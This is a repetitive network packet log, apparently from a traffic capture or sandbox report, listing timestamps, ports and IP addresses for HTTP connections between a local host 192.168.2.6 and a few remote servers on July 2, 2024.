Jul 2, 2024 00:05:08.068805933 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.068850040 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.068850040 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069000959 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069016933 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069026947 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069037914 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069046974 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069053888 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069068909 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069082022 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069082022 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069124937 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069219112 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069228888 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069238901 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069250107 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069261074 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069271088 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069282055 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069284916 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069284916 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069324970 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069469929 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069487095 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069495916 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069505930 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069515944 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069525003 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069525957 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069535971 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069545984 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069547892 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069556952 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069566011 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069576025 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069582939 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069586039 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069596052 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069611073 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069621086 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069621086 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069647074 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069883108 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069892883 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069904089 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.069935083 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.069962025 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070030928 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070041895 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070054054 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070065022 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070090055 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070108891 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070169926 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070180893 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070239067 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070239067 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070272923 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070282936 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070298910 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070322037 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070353985 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070429087 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070440054 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070449114 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070460081 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070470095 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070477009 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070481062 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070511103 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070533037 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070709944 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070720911 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070729971 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070739985 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070750952 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070763111 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070768118 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070772886 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070782900 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070792913 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070801973 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070812941 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070813894 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070813894 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070822001 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070833921 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070842981 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070844889 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070856094 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070866108 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070867062 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070878029 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070888996 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.070894957 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070934057 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.070934057 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071017981 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071027994 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071038961 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071048975 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071058989 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071059942 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071070910 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071093082 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071126938 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071218014 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071234941 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071244955 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071254969 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071259022 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071265936 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071294069 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071336985 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071392059 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071402073 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071410894 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071422100 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071432114 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071439028 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071441889 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071484089 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071484089 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071532965 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071593046 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071626902 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071635962 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071645975 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071655035 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071662903 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071665049 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071675062 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071683884 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.071698904 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071716070 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.071741104 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.072938919 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.072949886 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.072961092 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073000908 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073009014 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073010921 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073021889 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073029041 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073033094 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073050022 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073075056 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073331118 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073340893 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073352098 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073362112 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073371887 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073374987 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073383093 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073393106 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073399067 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073402882 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073414087 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073430061 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073430061 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073440075 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073448896 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073451042 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073462009 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073471069 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073481083 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073482037 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073489904 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073492050 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073502064 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073513031 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073517084 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073523045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073532104 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073542118 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073544025 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073544025 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073565960 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073591948 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073687077 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073697090 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.073738098 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.073738098 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.077023029 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.077116966 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084038019 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084065914 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084075928 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084074974 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084104061 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084139109 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084144115 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084150076 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084191084 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084191084 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084211111 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084222078 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084234953 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084254980 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084254980 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084273100 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084341049 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084352016 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084362030 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084372997 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084383965 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084388018 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084388971 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084394932 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084419012 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084454060 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084594965 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084605932 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084615946 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084625959 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084635973 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084646940 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084649086 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084649086 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084656954 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084666967 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084676981 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084677935 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084686995 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084697008 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.084709883 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084711075 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084762096 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.084999084 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085010052 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085020065 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085031033 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085042953 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085055113 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085055113 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085083008 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085277081 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085288048 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085298061 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085308075 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085319042 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085319042 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085328102 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085339069 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085355043 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085355997 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085355997 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085366011 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085376024 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085381985 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085387945 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085397005 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085406065 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085408926 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085416079 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085427046 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085437059 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085442066 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085442066 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085448027 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085465908 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085488081 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085496902 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085685015 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085695982 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085705996 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085717916 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085730076 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085741043 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.085747004 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085762024 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085762024 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.085799932 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.089402914 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.089582920 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.089687109 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.089780092 CEST	49733	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.089916945 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.090514898 CEST	49726	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.092044115 CEST	49734	80	192.168.2.6	87.240.132.78
Jul 2, 2024 00:05:08.095422029 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095438957 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095451117 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095467091 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095474005 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.095479012 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095515013 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.095565081 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095575094 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.095577002 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095588923 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095597982 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095617056 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.095635891 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.095647097 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095659018 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095669985 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095680952 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095705032 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.095716000 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.095825911 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095835924 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095851898 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095861912 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095871925 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095881939 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095891953 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.095896006 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.095896006 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.095926046 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.095947027 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096029043 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096040010 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096049070 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096060991 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096071005 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096076012 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096081972 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096092939 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096096992 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096124887 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096143961 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096333027 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096343994 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096354008 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096364975 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096371889 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096375942 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096386909 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096394062 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.096396923 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.096409082 CEST	80	49714	77.105.133.27	192.168.2.6
